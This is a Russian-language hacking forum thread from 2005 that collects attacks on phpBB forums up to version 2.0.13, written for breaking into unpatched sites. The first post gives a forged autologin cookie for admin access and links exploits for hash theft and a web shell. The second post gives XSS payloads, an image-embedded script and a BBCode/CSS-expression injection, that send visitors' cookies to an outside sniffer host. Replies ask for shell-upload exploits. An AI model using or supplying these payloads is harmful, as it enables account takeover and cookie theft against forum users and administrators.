Форумы Уязвимости в форумах phpbb до версии 2.0.13

Discussion in 'Уязвимости CMS/форумов' started by *Van*, 29 Oct 2005.

  1. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Я решил собрать всю инфу об уязвимостях в форумах phpbb до версии 2.0.13. Просьба все сплойты, xss, и т.д. писать сюда. Замечания также не помешают.
    +++++++++++++++++++++++++++++++++++++++
    Уязвимость с куками. (до версии 2.0.12)
    Просто регимся на форуме, и в опере ставим в параметре phpbb2_data вот это:
    Code:
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%220202fc3ced2145ef9a5cff66b6c5c689%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D
    Это переделанный кук, который позволит нам зайти под админом. Далее иногда нам позволят зайти в админку, а иногда на заход в админку стоит ещё одна проверка пароля. Ну что ж, останется только похулигать на самом форуме-до админки нам не добраться.
    Видео:KEZ, max_pain89.
    +++++++++++++++++++++++++++++++++++++++
    Эксплойт направленный на уязвимость в admin_styles. (до 2.0.12)
    Смотрите видео Wizi. Там всё есть, и сам сплойт тоже.
    +++++++++++++++++++++++++++++++++++++++
    Эксплойт направленный на уязвимость в модуле downloads(до версии 2.0.13).
    Позволяет узнать хэш любого юзера, в том числе и админа. Правда если пароль сложный, то это значит что нам не улыбнулась удача. По-моему, такие форумы с модулем downloadsстречаются очень редко, где-то я видел инфу, что они бывают только в немецких форумах, не знаю, лично я пока не нашёл такого форума.
    Сплойт: http://www.securitylab.ru/_Exploits/2005/04/downloads_phpBB_2_0_13.pl.txt
    Видео:ТОХА.
    ++++++++++++++++++++++++++++++++++++++++
    уязвимость highlight Сплойт до версии 2.0.10.
    Дает веб-шелл =)
     
    #1 *Van*, 29 Oct 2005
    Last edited by a moderator: 27 Nov 2005
  2. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    ++++++++++++++++++++++++++++++++++++++
    На ура работает xss с аватарой, подробно описано в статье censored! .
    Видео: по phpnuke от Green_Bear
    Создаём jpg-файл с кдом внутри
    Code:
    <script>img = new Image(); 
    img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    Загружаем на какой-нить сервер. С форума загружаем эту картинку себе на аватар. Затем отправляем юзеру ссылку на этот аватар(который уже на сервере этого форума), и идём ловить куки на сниффер.
    ++++++++++++++++++++++++++++++++++++++++
    Нужно проверить ещё этот код:
    HTML:
    [url]www.ut[url=www.s=''style='display:none;'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]
    Не знаю, может я его неверно подправил...
    ++++++++++++++++++++++++++++++++++++++
    В общем, у меня всё...оставьте свои замечания, у кого что когда получалось чем.
    Зачем мне это нужно? Просто часто необходимо взломать какой-нибудь задрипанный форум версии где-нить 2.0.6, а потом оказывается что ничего не проходит...форум пропатчен...обыдно, когда всякое старбе не получается взломать...поделитесь своими соображениями, плиз...
     
  3. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Гуд. Вот мое мнение, лучше о последних версиях инфу поболее, там как шелл залить можно и можно ли ваще... вобщем тема нужная.
     
  4. KP0T

    KP0T New Member

    Joined:
    13 Mar 2005
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    А типа раньше Я помню какойто баг был что фаил залить можно кто может эксплойт в приват скинуть?